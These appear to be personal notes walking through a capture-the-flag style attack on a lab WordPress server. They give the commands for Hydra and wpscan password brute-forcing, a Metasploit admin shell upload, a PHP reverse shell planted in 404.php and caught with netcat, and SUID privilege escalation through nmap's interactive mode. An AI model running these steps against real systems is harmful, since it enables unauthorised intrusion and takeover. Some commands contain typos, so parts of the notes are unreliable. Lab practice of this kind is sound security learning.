-Mr
-Nikto - Vuln Scanner to scan vuln on websites
-nikto -h 192.168.1.168(IP)

-check for robots.txt
-cat command to open txt files

-wget to download files
-wget 192.168.1.108/dic.txt

-common wp login
-wp-admin/wp-login.php or wp-login.php

-sort a dic file
-cat dict.dic | sort -u | uniq > wordlist.dic

-Hydra
-hydra -V -L wordlist.dic -p 1234 192.168.1.108 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'

- p will specify the password

-wpscan to bruteforece the wp password use with sudo 
-sudo bash
-wpscan --url 192.168.1.108 --wordlist /home/alexis/Desktop/wordlist.dic --username admin

-use pentest monkey reverseshell just download it and use it
-msfconsole for wp reverse shell upload 
-msfconsole
-use search to search for exploits
-use exploit/unix/webapp/wp_admin_shell_upload
-options
-set PASSWORD 12345678
-set RHOST 192.168.1.108
-set USERNAME admin
-set RPORT 80
-set TARGETURI /wp-login.php
-exploit


-If msfconsole dosent seems to work use pentest monkey reverseshell and modify the code
to change the host to our IP.
-for example use php reverse shell
-change the IP and the port.
-to upload use appearance in wp and go to editor to upload choose any file best bet is to use the 404.php
-nc -lvp 1234 (default port for the php revershell)
-use curl to load the page or just open it in the browser
-curl http://192.168.1.108/404.php
-id //command in linux
-use bin shell python
-python -c 'import pty; pty.spawn("bin/sh")' //if we are logged in as deamon to get the terminal i.e terminal
-crackstation.net helps us to crack md5 hash if they are under a certain threshold
-now to get super user permission use
-su - robot (robot is user we seek permission for)
-enter the password got directly or from md5 hash

-if we dont have lot of prevelages we need to escaalate prevelages or check for files we can access
-to find files we can access
-find / -perm -4000 2>/dev/null
-if the files we can access has nmap we can check for the nmap
-nmap --interactive
-!sh

